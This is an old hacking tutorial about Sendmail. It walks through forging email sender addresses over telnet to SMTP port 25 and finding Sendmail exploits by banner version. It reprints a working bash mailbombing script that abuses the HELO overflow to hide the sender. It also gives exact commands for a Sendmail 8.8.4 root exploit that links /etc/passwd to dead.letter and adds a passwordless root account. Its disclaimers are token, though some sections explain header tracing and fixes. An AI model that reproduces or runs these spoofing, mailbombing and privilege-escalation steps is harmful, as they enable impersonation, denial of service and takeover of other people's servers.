| Author :
Raven
Contents
========
Sendmail? Huh?
* What is Sendmail?
* What
is it used for?
* Why would I want to learn about Sendmail?
How do I
create authentically-looking fake mails?
* You mean I can send Emails
from bgates@microsoft.com or bclinton@whitehouse.org?!
* Is it possible
to create a 100% authentical Email?
* How can I learn raw Sendmail
commands by myself?
* But what if I'm lazy? Can you pleeease teach
me?
* How do I track down carelessly-made fake mails?
* How do I
track down more sophisticated fake mails?
* Can I get caught?
* Will
I get caught?
Hack the server? Through Sendmail?!
* Can I really
hack a host that runs Sendmail?
* So why is Sendmail called "the
buggiest daemon on Earth" anyway?
* Okay, great. Now how do I do
it?
* Can you tell me more about various Sendmail security holes?
*
Where can I find more Sendmail security holes?
* How can I tell what
version of Sendmail the target host is running?
* Why should I care
anyway?
* How can I use the BugTraq archives to find the holes I'm
looking for?
* Can I get caught?
* Will I get caught?
* Final
Notes
Okay, so I can hack a host which runs Sendmail. How do I do
it?
* A Local DoS(29) in All Sendmail Versions Up to 8.9.3
* Bug in
Sendmail's HELO command
* Giant Bug in Sendmail 8.8.4
* Final
Notes
Newbies corner
* What is a daemon?
* What is a port?
*
What is a service?
* What is a daemon banner?
* What is a timeout
(in computer terms)?
* What is TCP and how does it work?
* What is
UDP and how does it work?
* What is ICMP and how does it work?
*
What is an IP address?
* What is a hostname?
* How to find out what
your ISP's mail servers are?
* What is a portscanner?
* What is a
services scanner?
* What/who is root?
* What is bandwidth?
* What
is a client program?
* What is a DNS server?
* What is Telnet (the
Telnet daemon and the Telnet program)
* What is a command
interpreter?
* What is a shell account?
* Who is a sysadmin?
*
What is hyper text?
* What is an RFC?
* What is InterNIC?
* What
is a sub domain (and how much does a domain really cost?)?
* What is
SSH?
* What is a moderated mailing list / message board?
* What is a
DoS attack?
* What is DUN?
* What is a dial-up account?
* What is
a Unix password file?
* What is a thread?
Appendix A: Fake
Daemons
* Fake Sendmail daemon
* Fake Telnet daemon
Appendix B:
Routing Mail
* How can I route my mail?
* How would that help
me?
Appendix C: Faking the sender's IP
* How can I fake my IP on the
Email's header?
* Where can I read more about this kind of
stuff?
Appendix D: Reply-to
* What does the Reply-to option do?
*
How do I use it?
Appendix E: CC and BCC
* What do these commands
do?
* How do I use them?
Sendmail? Huh?
==============
Sendmail is a daemon(1) which waits for connections on
port(2) 25. It is used to send outgoing mail.
For example: your Email
provider (probably your ISP (Internet Service Provider)) probably uses two
servers (unless it's a web-based mail account such as Hotmail.com):
1)
mail.boring-ISP.net (probably port 110): for incoming mail.
2)
mailgw.boring-ISP.net (port 25): for outgoing mail.
Most of the time
mail servers look pretty much like this, but the addresses vary from
different ISPs.
Mail.boring-ISP.net would require a username and a
password so people won't be able to read your Emails, so let's skip this
one (I might discuss cracking those passwords in another tutorial, but
remember - I'm teaching you these things so you'll be able to know how
malicious crackers work and not fall for their tricks, not for you to
break the law and harm others). Now, as surprising as it may sound,
mailgw.boring-ISP.net will not require a password or any other means of
identification. If you telnet(19) into mailgw.boring-ISP.net on port 25
and type in the right commands you will be able to send fake mails.
Interesting, huh?
Now, the coolest part is that you can actually hack a
server running Sendmail or at least bring it down, since Sendmail contains
a crapload of bugs and security holes.
How can I create
authentically-looking fake
mails?
==================================================
As
mentioned in the previous chapter, sending mail does not require you to
have an account on the machine you're sending the mail from (the mail
server, not your computer). All you need to know is the IP Address(9) /
Hostname(10) of the mail server and Sendmail commands.
So far we assume
that you know the IP/hostname of your target. If you still don't know this
important detail, please find out(11).
Now, let's get on with it.
This time, unlike previous tutorials, I will "learn" all over again how to
do everything I describe here and walk you through the entire process of
learning and using what you have learnt.
Alright, let's begin.
Our
target outgoing mail server for today is mailgw.someone.com on port
25.
First, let's telnet into that port by either typing 'telnet
mailgw.someone.com 25' (without the quotes) on a standard Unix text-based
system, running C:\Windows\telnet.exe or your favorite telnet application
and typing in mailgw.someone.com in the host field and 25 in the port
field, or executing your favorite telnet application from XWindows (a
graphical interface for Unix. If you're smart enough to be running some
version of Unix you shouldn't have a hard time finding one. If you don't
like the default telnet programs you could always go to www.linuxberg.com
and grab one) and typing in the correct details (host and port).
Note
about VT: you might be asked to choose a terminal type during the
connection process. Something with VT and some number in it...
hmm...
VT stands for Virtual Terminal. Since there are several types of
terminals (all sorts of monitors, old printer terminals etc') you are
asked to choose a terminal type (compatibility issues). VT100 should suite
most people just fine.
Note about shell accounts(21): if you're not
running Unix and you wish to use Unix tools on Unix systems while you
work, telnet to nether.net on port 23, login as newuser and get yourself a
free shell account. If you'd rather user Window's tools (I use Window's
stuff when I work from Windows, except certain conditions when I really
NEED Unix and I don't want to reboot and boot it up. In that case, I get
myself a shell account so I am able to use Unix stuff while working from
Windows) go ahead (things will work faster since the tools are actually
located on your machine, not on some distant computer which runs a shell
account), but I still recommend that you will get a shell account at
nether.net (in fact they teach you a lot of great Unix-newbies stuff when
you sign up).
Note about Telneting from Macintosh: Macintosh does not
come with a Telnet program. However, you can download one from:
http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/ (thanks to little_v for
this one!).
Now, let's see what we get after we telnet(19) to
mailgw.someone.com:25 (in this case, the character : stands for 'on port',
so mailgw.someone.com:25 means mailgw.someone.com on port 25).
220
alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04
+0000 (GMT).
AHA! This is... this is... ugh... WHAT THE HELL IS
THIS THING?! This, my friends, is a daemon banner(4), and it just gave us
tons of valuable pieces of information!
Normally, this info is intended
for a client program(16) to determine what version of Sendmail the target
is running and how to communicate with it (the program should know that,
for example, every Sendmail version below 7.0.0 uses the command 'halb'
instead of the command 'blah', etc').
This daemon banner thing is also
great for hackers and crackers, since we can determine what version our
target is running. Later, when we will discuss about how to actually hack
the server, this data would be EXTREMELY valuable.
Okay, let's analyze
what we've got...
220... we don't know what this is right
now...
alpha.someone.com... no luck, can't make anything out of it so
far...
ESMTP... hmm... SMTP stands for Simple Mail Transfer Protocol.
It is the protocol(18) used by email clients to communicate with Sendmail
daemons, and this is what we're trying to learn right now. ESMTP is
Extended SMTP. It's the same as SMTP, only it contains some more commands.
Let's leave this alone for the time being.
Sendmail 8.9.3/8.8.6 - AHA!
There's something interesting. We got the version of the Sendmail daemon!
Remember this, it will help us during the next chapter (hacking into
servers who run Sendmail).
The rest is garbage (time, date, etc' etc'
etc').
Okay, so let's move on... umm... how do I communicate with this
thing?
Er... let's try typing 'help' (without the quotes). Oh, by the
way, it is normal not to see what you type when you talk to Sendmail since
it won't send back your keystrokes. You have to turn on "local echo" in
your telnet program in order to see what you type.
214-This is
Sendmail version 8.9.3
214-Topics:
214- HELO EHLO MAIL RCPT
DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN
DSN
214-For more info use "HELP ".
214-To report bugs in the
implementation send email to
214-
sendmail-bugs@sendmail.org.
214-For local information send email to
Postmaster at your site.
214 End of HELP info
Wee! This is
cool!!
By this time you should have guessed that this number (the 220
in the daemon banner and the 214 here) is actually a 'message type'. It
states the type of the message you got. Each type of message (error
because of this, error because of that, help page for this, confirmation
message for that etc') has it's own number.
Okay, let's move on. Let's
try typing 'help helo'.
214-HELO
214- Introduce
yourself
214 End of HELP info
See? I told you so. 214 is the
message type number for help messages.
Okay, so that way you can
practically teach yourself what every Sendmail command does. Stop right
now, read all the help pages and then continue. It is important that
you'll learn how to learn things by yourself. You might see some notes
concerning the word RFC(24) and some numbers. You can find RFCs at
http://www.linuxberg.com.
Note about ESMTP: remember that ESMTP thing
we came across? You'll be able to get a good clue on what ESMTP is by
reading the help pages. Yes, I am trying to force you to read them... so
please do. They contain tons of great information for newbies as well as
pros.
Okay, I'm assuming you've finished reading all those help
pages. Now let's move on. First we need to enter a sender. We do this by
typing 'MAIL FROM: ' (remove the quotes and replace
fake Email address with the fake Email address of your choice, say...
bgates@microsoft.com (but leave the < and the >)).
The mail
server should reply with this message:
250 bgates@microsoft.com...
Sender ok
Next we type 'RCPT TO: '. Replace recipient
with the target, say victim@victim.com. We should get
250
victim@victim.com... Recipient ok
You can add recipient by simply
doing this command several times, only with different
recipients.
Now, let's move on to the actual message body. Type
'data' to start writing the body of the message.
354 Enter mail,
end with "." on a line by itself
Now let's type in some
stuff...
Subject: fake message (note about this line: in this line
you get to determine what subject you want to give for your
message).
Hello. This is a fake Email message.
I'm bored.
Gimme
something to hack!!
Now we get this
250 CAA15313 Message
accepted for delivery
You must be wondering right now what the heck is
that number after the 250. This is called the message ID (or MID). It's
just a stupid number, but we'll use them later... don't you worry your
pretty head about this.
Now, if you were the recepient you would have
got a 100% reliably-looking fake mail. OR IS IT?
Let's take a look
at what the recepient would get...
Hmm... welp, looks like an ordinary
message to me. At least it does to the ordinary user.
Now let's look at
the headers.
Headers are a couple of lines which come with every Email
address. Most of today's Email clients show only the simpler parts of the
header (sender, subject, date and time etc'), but right now we need the
full header.
On Netscape Messanger displaying the full headers is done
by going to View ==> Headers ==> All. On Eudora this is done by
clicking on the button which displays the "blah blah blah" caption when
you put your mouse cursor above it for a second or two.
Compuserve
automatically displays the full header.
On Outlook, right click the
message on your inbox, choose properties and choose details. On pine, you
should have an option somewhere in the configuration screens that let's
you choose what kind of header you want to view (full or briefed).
Now
let's take a look at the full header, shall we?
Received: from
alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by
cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id CAA15313 for
victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300 (IDT)
From:
bgates@microsoft.com
Received: from some.hostname.crap.com
(some.hostname.crap.com [62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6)
with SMTP id CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46
+0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID:
<199907092355. CAA15313@alpha.someone.com X-Authentication-Warning:
alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO
protocol
Subject: Fake mail
Status:
X-Mozilla-Status:
8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff
Yeehaw!
Look at all those numbers and letters and shiny things!
Let's start
from the top, shall we?
Received: from alpha.someone.com
(alpha.someone.com [194.90.1.13]) by cmx.someone.com (8.9.3/8.9.3) with
ESMTP id CAA16970 for >; Sat, 10 Jul 1999 02:49:59 +0000 (GMT) Okay, so
the mail was received from alpha.someone.com (alpha.someone.com
[194.90.1.13]). What does that mean?
A quick checkup on InterNIC(25)'s
databases (type 'whois alpha.someone.com' without the quotes on a Unix
system or download SamSpade for Windows at www.samspade.org) reveals that
it is owned by someone.com. This is probably some kind of a sub-server
they use to send mail. Let's leave it alone, it's not important to us
right now. The (alpha.someone.com [194.90.1.13]) part shows you the
hostname(10) and the IP address (9) of the server the Email was sent
from.
Ooh, ooh, wait! Wasn't the mail supposed to be sent from
microsoft.com? I mean, the sender is bgates@microsoft.com!
If we did
the mail forging thing on microsoft.com instead of on someone.com this
wouldn't have happened, now would it? It would have seemed like an
ordinary Email... from Bill Gates... well, at least so far.
Anyway, the
rest is just the MID (which we will get to later) and the date of the
message (the sending date) according to the server which the message was
sent from. The +0000 (GMT) part means that it was sent from the Greenwich
time zone. If it was sent, for example, from the +0200 time zone it would
have meant that this time zone's time is actually Greenwich time plus 2
hours. Find our your time zone first so you'll be able to switch time
zones and find out when was the message sent in your time.
Now, on to
more important things.
From: bgates@microsoft.com
Well, I
guess this line is obvious... let's move on.
Received: from
some.hostname.crap.com (some.hostname.crap.com [62.0.146.225]) by
alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313 for
victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Okay, now
this is really interesting. Now we get the sender's hostname and IP
address. Note about the hostname: a dial-up(31) user will have a long and
twisted hostname. For example: my hostname right now (at least when I was
writing these lines) is RAS4-p97.hfa.netvision.net.il. Netvision.net.il is
my ISP, and the rest is mostly crap (pay close attention to the hfa thing.
Hfa stands for Haifa, which is my home town. It means that I'm connected
through Netvision's Haifa server. See? Hostnames can be
interesting).
You must have noticed by now that the hostname we got is
certainly not from microsoft.com, and that the mail server who sent this
isn't exactly microsoft.com or a microsoft sub-domain(26) either, which
clearly shows that this Email is completely fake.
Another note about
the hostname: sometimes you might not get a hostname, but you will always
get an IP address. You can find the IP's hostname (most IP addresses do
have a hostname) by doing 'nslookup ip-address' without the quotes on a
Unix system or going to http://www.samspade.org and using their DNS(17)
Lookup Tool. If you still can't get it, try doing a whois.
To overcome
this problem, you need to do two things:
1) Send this mail from
Microsoft's Sendmail server.
2) Send this mail from an account that is
connected to the web through Microsoft. If you can't get one, it will
clearly show in the headers that the mail wasn't sent from
Microsoft.
Note: nice trick to pull on someone: if your ISP is
blah.com, you can send your friends an Email from admin@blah.com which
will look 100% authentic!
Anyway, the next few characters give us
the MID (Message ID), as well as other pieces of info. I promised we'll
get to the MID, didn't I?
If you think someone is trying to trick you
into thinking he's somebody else, send an Email to abuse@your.ISP.com or
abuse@the.ISP.where.the.message.came.from.com (in this case Microsoft.com)
or abuse@the.server.who.stores.the.MID.com.
To know which server stores
the MID, we'll need to skip a few lines (two lines actually - time and
date) and get straight to this:
Message-ID: <199907092355.
CAA15313@alpha.someone.com>
Aha! Look at these interesting
numbers! And check this out: CAA15313@alpha.someone.com! This means all
the info regarding the MID is stored at alpha.someone.com! Let's send an
Email to abuse@alpha.someone.com and tell them that we think we received a
fake mail, and include the entire header. Next thing we'll do the same
with the ISP of the sender (in our case, the sender is
some.hostname.crap.com [62.0.146.225], meaning his ISP is probably
crap.com).
Now, on to the next
line:
X-Authentication-Warning: alpha.someone.com:
some.hostname.crap.com [62.0.146.225] didn't use HELO
protocol
Damn! I knew we forgot something! Now let's do it all over
again, but this time we'll type HELO microsoft.com at the
beginning.
HELO microsoft.com
We get this:
250
mailgw1.netvision.net.il Hello some.hostname.crap.com [62.0.146.225],
pleased to meet you
The rest is exactly like in the last time (sender,
rcpt to, etc' etc'). Now let's see what victim@victim.com would have
gotten.
Aha! No X-Authentication-Warning!
Final
notes
-----------
I hope you enjoyed this chapter. Now you've learnt
how to play harmless and legal tricks on your friends, how to spike-down
fake mails and how easy it is to catch you if you're trying to do illegal
stuff.
Oh, and by the way, there is a way to hide your IP/hostname when
faking mail... for more information, read the second section in the 'Okay,
so I can hack a host which runs Sendmail. How do I do it?'
chapter.
Hack the server? Through
Sendmail?!
===================================
Yeah, sure, why not?
I mean, EVERY service(3) is vulnerable to some attacks. That's why it is
recommended to run as less services possible on your computer.
But the
most vulnerable one is Sendmail (this is why it is called 'the buggiest
daemon on Earth' or 'the buggiest daemon on the planet'). A member of the
mailing list once told me that he just can't wait to read the Sendmail
Tutorial (this was before this tutorial has been released) and that he
himself runs Sendmail on his computer. Running Sendmail on a personal
computer is unnecessary and dangerous. If your computer does not act as a
mail server, there is no reason for you to run Sendmail (unless you want
people to be able to send mail to your-account@your.IP.address instead of
your-account@your.ISP.com. Note about your-account: in the first address,
your-account is the name of your username on your own computer (Unix users
should know what I am talking about). In the second address, your-account
is your username at your ISP).
Note: the information in this chapter
can be either used to hack servers, or the other way around - to protect
your server. Please don't break the law, or at least don't spew out my
name during the investigations... hehe...
Okay, so the first thing
we have to do in order to hack a server through a specific service (or to
improve the security of a specific server) is it's (the service's)
version. This can be easily done by viewing the daemon banner(4). Suppose
we came across a computer that runs Sendmail 8.8.3 (which was quite old
when this tutorial was written, meaning there should be a couple of bugs
here. Sendmail is upgraded mostly when a new bug is found. In fact,
everything except of the daemon's security is rarely changed during
upgrades).
Next thing we'll try to determine the OS (Operating System)
which this daemon runs on. If Sendmail's banner won't tell us, the
Telnet(19) daemon will. First telnet to port 23 and cross your fingers. If
there's a daemon on that port, it's probably the Telnet daemon, and it'll
probably give you the name and version of the OS. If not, you can
either:
1) Try looking for a guest account (username: guest, password:
guest or username: newuser, password: newuser), since some systems give
you these details only after you log in.
2) Email admin@your-target.com
and ask him (I recommend opening a mailbox on one of those free mailbox
services such as Hotmail and Emailing him from there, since some
admins(22) might get a little suspicious...).
3) Try going to your
target's website. This kind of information might be there,
somewhere.
If you still didn't find the OS, fear not! We might
still be able to do a cool hack without this information, but still this
information might come in handy, so do all you can to get your hands on
it.
Next thing, you browse some online databases until you find the
hole you've been looking for. First of all I'll explain about the largest
and most recommended online databases, and then I'll teach you how to
search them, plus some valuable concepts and words you need to get
familiar with.
Packet Storm
Security
+++++++++++++++++++++
URL:
http://packetstorm.securify.com.
One of the largest online databases
for security-related information. I recommend going there once a day and
reading the 'New Files Today' section, whether you're looking for specific
holes or not.
The archive was founded by Ken Williams and gets hundreds
of thousands of hits per week.
It has recently been transferred into
the ownership of Kroll-O-Nagra (www.securify.com).
Security
Focus
++++++++++++++
URL: http://www.securityfocus.com.
Another
comprehensive database. Updated daily. These guys never
sleep!
BugTraq
+++++++
URL: hosted by Security Focus
(http://www.securityfocus.com), previously hosted by Netspace
(http://www.netspace.org).
BugTraq is one of the best security mailing
list out there. The list is moderated, meaning that if you find a new
security hole, you can only send your message to the moderator, Aleph1
(aleph1@underground.org). Aleph1 filters out all the spam, lame messages
and old bugs and posts only the good ones to the list.
I recommend
signing up at http://www.securityfocus.com. You can also search their
archive, which is by the way my favorite security-related database, by
going to securityfocus.com and looking for a link called
'search'.
Searching
*********
If we are looking for a bug in
Sendmail 8.8.3, we'll need to type the following search keywords:
'sendmail 8.8.3' (without the quotes). If we're looking for something
specific, such as a local DoS(29) attack against any version of sendmail,
we will use the following search keywords: 'local DoS sendmail',
etc'.
Searching Packet Storm
++++++++++++++++++++++
Packet
Storm should have a search box somewhere (Ken changes the layout every now
and then so I can't give you the exact location of the box). You can
divide the search results you will get into two categories: texts and
programs.
For example: you searched for a specific hole and you got a
couple of text files and a couple of programs. The text files explain
about the bugs and how to exploit it, while the programs use the hole to
get in.
These programs are often called 'exploits' and usually come as
a source code instead of as a binary file. Let me explain: a binary file
is any file that isn't made of text. Executable files are usually binary
files. Now, in our case, programs come as sources instead of binary.
Sources are in the form of plain text, and they're actually a bunch of
commands. When given to a compiler, this source code turns into an
executable binary (except for source codes written in the Perl programming
language, which can be executed in the form of sources if you have the
right program). Anyway, these programs come in the form of sources so you
will be able to understand how they work instead of blindly running
them.
Searching Security
Focus
++++++++++++++++++++++++
Security Focus offers more organized
information. Instead of various bits of information, Security Focus offers
articles. These include exact definitions of the bug, where and when it
should happen, work-arounds (how to solve it) etc'. The only backdrop in
Security Focus is that it is smaller than other
databases.
BugTraq
+++++++
Ah... my favorite database. When
people post something to BugTraq about a security hole they found, other
people can reply to them and share their side of the story. For example:
did it work on their computer too, how to fix the bug in various ways,
what causes the bug in the first place etc'. You can compile a full
database with all of the necessary information by simply reading a couple
of posts.
Getting Caught
**************
If you're planning on
doing something bad, please don't. You can get caught. Better crackers
than you already got caught. Don't be stupid.
Okay, so I can hack a
host which runs Sendmail. Now how do I do
it?
===================================================================
I
have made a nice list with several security holes regarding Sendmail just
to give you the hang of it.
A Local DoS(29) in All Sendmail
Versions Up to 8.9.3 (taken from Packet
Storm)
****************************************************
Date:
Sat, 3 Apr 1999 00:42:56 +0200 From: "[iso-8859-2] Michał Szymański"
To: BUGTRAQ@netspace.org
Subject: Re: Possible
local DoS in sendmail
Hi folks,
This local queue filling DoS
attack in sendmail is quite dangerous. But good security policy (like
mine) will prevent attackers from doing such things. Control files (in
/var/spool/mqueue) created by 'sendmail -t' are owned by
root.attacker's_group; turn on quotas for group 'attacker's_group' on the
file system containing /var/spool/mqueue directory, and your host will be
not vulnerable; but you _have to_ configure your sendmail as _nosuid_
daemon;
Much more dangerous are remote queue filling DoS attacks.
If you have enabled relaying, you can use shown below smdos.c proggie; it
will quite fast fullfill partition on disk where /var/spool/mqueue
resides. you should notice increased LA during attack; in contrast to
local DoS attacks, control files created by smdos.c are owned by
root.root, so ... it's much more difficult to prevent offenders from doing
it;
don't forget to change BSIZE definition (in smdos.c) to
appropriate victim's host message size limitation (MaxMessageSize option);
you can also increase MAXCONN definition.
smdos.c:
-----CUT FROM TEXT BOX-----
-----CUT HERE-----
Bug in Sendmail's HELO
Command (taken from
rootshell.com)
******************************
Note: this won't get
you root access(14) or get you into partsin a system you're not supposed
to get into, but this is still pretty cool. In fact, it let's you hide
your IP/hostname when faking mail!
[ http://www.rootshell.com/
]
We've had this exploit since January but sat on it until everyone
had a change of implementing a stable version of sendmail 8.9.x. (And
because the last thing I want to do is help the spammers) It has now made
its way to Bugtraq so without further ado.
--Rootshell
5/28/98
Date: Fri, 22 May 1998 12:36:54 +0300
From: Valentin
Pavlov
Subject: about sendmail 8.8.8 HELO
hole
I assume this this is pretty old (10 Jan 1998) but
still...
I found a pretty simple way to prevent the hiding of the
sender's IP address. The method to hide the IP address of the sender is
described bellow. Now, if we want to keep track of such exploit attempts,
we have to compile sendmail 8.8.8 with a PICKY_HELO_CHECK defined in
conf.h:
#define PICKY_HELO_CHECK 1
This will force sendmail
to syslog an authentication warning (message with LOG_INFO level) and
include an X-Authentication-Warning: header in the message, saying what
host tried to hide itself. Check out the source (srvrsmpt.c, main.c).
Also, LogLevel must be set to a value higher than 3 (default is 9) in
sendmail.cf.
regards,
capone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Make
source, not [high]score
----------------------------
Valentin 'Val
Capone' Pavlov
----------------------------
capone@netbg.com,
UKTC87203
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Now for the original
message, describing the exploit:
-----Original
Message-----
From: Michał Zalewski
To:
info@rootshell.com
Date: 10 stycznia 1998
12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.
Here's a brief
description of Sendmail (qmail) hole I found recently:
When someone
mailbombs you, or tries to send fakemail, spam, etc - sendmail normally
attachs sender's host name and it's address to outgoing
message:
--
>From spam@flooders.net Mon Jan 5 22:08:21
1998
Received: from spammer (marc@math.university.edu
[150.129.84.5])
by myhost.com (8.8.8/8.8.8) with SMTP id
WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5
Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id:
<3.14159665@pi>
MAILBOOM!!!
--
That's perfect - now
you know, who is responsible for that annoying junk in your mailbox:
"Received: from spammer (marc@math.university.edu [150.129.84.5])".
Nothing easier... But I found a small hole, which allows user to hide it's
personality, and send mails anonymously. The only thing you should do is
to pass HELO string longer than approx. 1024 B - sender's location and
other very useful information will be cropped!!! Message headers should
become not interesting. Sometimes, sender may become quite untraceable
(but not always, if it's possible to obtain logs from machine which has
been used to sent):
--
>From spam@flooders.net Mon Jan 5
22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's]
...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From:
spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!!
Now guess who am I...
--
Here's a simple example of Sendmail's
HELO hole usage. Note, this script has been written ONLY to show how easy
may be sending fakemails, mailbombs, with cooperation of Sendmail ;)
Script is very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected, probably
Qmail?):
-- EXPLOIT CODE
--
#!/bin/bash
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20
echo
echo
"SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author:
Michal Zalewski "
echo
if [ "$4" =
"" ]; then
echo "USAGE: $0 msgfile address server
sender"
echo
echo " msgfile - file to send as a message
body"
echo " address - address of lucky recipient"
echo " server -
outgoing smtp server w/sendmail"
echo " sender - introduce
yourself"
echo
echo "WARNING: For educational use ONLY. Mailbombing
is illegal."
echo "Think twice BEFORE you use this program in any way.
Also,"
echo "I've never said this program is 100% safe nor
bug-free."
echo
sleep 1
exit 0
fi
if [ ! -f $1 ];
then
echo "Message file not found."
echo
exit 0
fi
echo
-n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700
$TMPDIR
echo "echo \"helo
___safebomb__safebomb__safebomb>$PLIK
echo "echo \"mail from:
\\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\""
>>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat
<<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo
"__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo
\"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x
$PLIK
echo "OK"
echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z
to abort."
SENT=0
while [ -f $1 ]; do
$PLIK|telnet $3 25
&>/dev/null &
let SENT=SENT+1
echo -ne "Sent:
$SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
CONNECTED=`ps|grep -c "telnet
$3"`
if [ "$LIMIT" -le "$CONNECTED" ]; then
while [ "$LIMIT" -le
"$CONNECTED" ]; do
sleep 1
done
fi
if [ "$SENT" -ge "$MAX" ];
then
echo "It's just an example, sorry."
echo
exit
0
fi
done
-- EOF --
Suggested fix: insert additional
length limit into HELO/EHLO parameter scanning routine OR disable
AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8
sources at the time, so execuse me if it's
unclear.
PS:
--
From: Gregory Neil Shapiro
I was able to reproduce the header
problem by lengthening the HELO string
in your
script.
[...]
This will be fixed in sendmail
8.9.
--
_____________________________________________________________________
Michał
Zalewski [tel 9690] | finger 4 PGP
[lcamtuf@boss.staszic.waw.pl]
Iterować jest rzeczą ludzką, wykonywać
rekursywnie - boską [P. Deustch]
=--------- [ echo "while [ -f \$0 ];
do \$0 &;done" >_;. _ ] ---------=
Giant Bug in Sendmail
8.8.4 (taken from
hackersclub.com)
***************************
sendmail8.8.4
exploit
"sendmail? 'tis the bugiest program" -phriend-
Ok,
here's a brief and interesting explonation of this famous exploit. This
exploit uses sendmail version 8.8.4 and it requires that you have a shell
acount on the server in question. The exploit creates a link from
/etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it
works, below are the exact commands as you have to type them (for the
technically challendged ones)
* ln /etc/passwd
/var/tmp/dead.letter
* telnet target.host 25
* mail from:
nonexsistent@not.an.actual.host.com
* rcpt to:
nonexsistent@not.as.actual.host.com
* data
* lord::0:0:leet
shit:/root:/bin/bash
* .
* quit
Kaboom, you're done, telnet
to port 23 and log in as lord, no password required. Thanx to a little bit
of work we did, lord just happens to have the same priviledges as
root.
There are a couple of reasons why this might not
work.
1. /var and / are different partitions (as you already know,
you can't make hard links between different partitions)
2. There is a
postmaster account on a machine or mail alias, in which case, your mail
will end up there instead of being written to a etc/passwd
3. /var/tmp
doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu
Editor's notes: lord::0:0:leet
shit:/root:/bin/bash is a line out of a Unix password
file(33).
Final Notes
---------------
You must have noticed
that I didn't put anything from BugTraq. This is because everything that
goes to BugTraq gets at least one reply (from my experience), and I don't
feel like posting whole threads(34) here (they're too damn
long).
Newbies corner
==============
1. Daemon - a program that
listens for incoming connections on a specific port(2). Some daemons may
receive commands from you and interact with you, others may simply spew
out some text/binary and quit.
2. Port - (for the more technical
explanation of what ports are, see the end of this explanation) ports are
like holes that enable things (data, in this case) to come into them.
There are physical ports and software ports on your computer. Physical
ports are those slots on the back of your computer, your monitor etc'.
Now, software ports are used when connecting to other computers.
For
example: I just bought a new computer and I want to turn it into a
webserver (I want to enable people to access selecetd web pages, pictures,
cgi and java scripts or applets, programs etc' that are located on my
computer (MY computer, not on some cheesy free webhost such as Geocities),
and I want those people to be able to do that using nothing but a
browser). In order for that to happen, I need to install a webserver
program.
The webserver program opens a port on my computer called port
80 (this number can be changed, but this is the default number). Then it
listens to incoming connections on that port. When someone starts his
Internet browser (Netscape, Lynx, Microsoft Explorer etc') and surfs to my
website, his browser connects to my computer on port 80 and then sends
HTTP commands that my webserver program can understand into it.
My
webserver program quickly picks up the incoming data and then sends it
back into a port that the surfer's browser opened on the surfer's
computer. The browser will listen on that port and wait for the data (the
HTML page, the picture, the program etc') to come in through it. Note
about non-default ports: if you decide to put, say, a webserver on a
non-default port, it'll be harder for people to get in. If you decided to
put it on port... umm... 8000 instead of 80, people will have to type in
your IP address(9) or your hostname(10) if you have one and add a :8000 at
the end. For example:142.30.5.79:8080. Simply typing in 142.30.5.79 inside
your browser's URL field is as same as typing 142.30.5.79:80, so it's best
to put a webserver on port 80 (unless you only want a specific group of
people who will be given that number to access your webserver, but such a
blockage can be easily cracked using a portscanner(12)).
There are
different ports for different services(3) so data won't mix up. Imagine
your browser getting data your FTP client was supposed to get.
I hope
you got the main idea of what a port is.
Now, there are three kinds of
ports: well-known ports, registered ports and dynamic/private
ports.
The well known ports are those from 0 through 1023. These are
default ports for several services. For example: the default port for
webservers is 80. Else, how would your browser know which port he has to
access?
Now, the registered ports are those from 1024 through 49151.
These ports are reserved for several programs. For example: ICQ
(www.icq.com) reserves several ports for listening to various incoming
events (messages, file transfers etc') on it.
The dynamic and/or
private ports are those from 49152 through 65535, and can be used by
anyone for any given purpose.
Important note about well-known
ports: services(3) on these ports can be only ran by root, so inferior
users won't start messing up with important ports.
3. Service -
a daemon(1) that allows everyone who connects to it (or a specific group
of people. For example: anyone from this IP(9) range, everyone who knows
the secret password etc') to use some kind of service.
For example: a
webserver such as the one described in section one on this chapter (the
explanation regarding what is a port) is a service because it allows
people to come in and ask for certain pieces of data.
The simplest
example of a service I can think of is "daytime". Daytime waits for
incoming connections on port(2) 13 and when someone goes by it immedietly
announces the current time on the computer that runs it (with no need from
you to type in any commands or passwords or anything). Simple.
4.
Daemon banner - most daemons(1) give away some technical info to anyone
who connects to them on some point. This information can be used by anyone
who connects to that daemon simply for it to know how to interact with the
daemon best (which daemon is it, what version, etc'), but it can also be
used by hackers.
Let's try connecting to port(2) 23 on someone.com
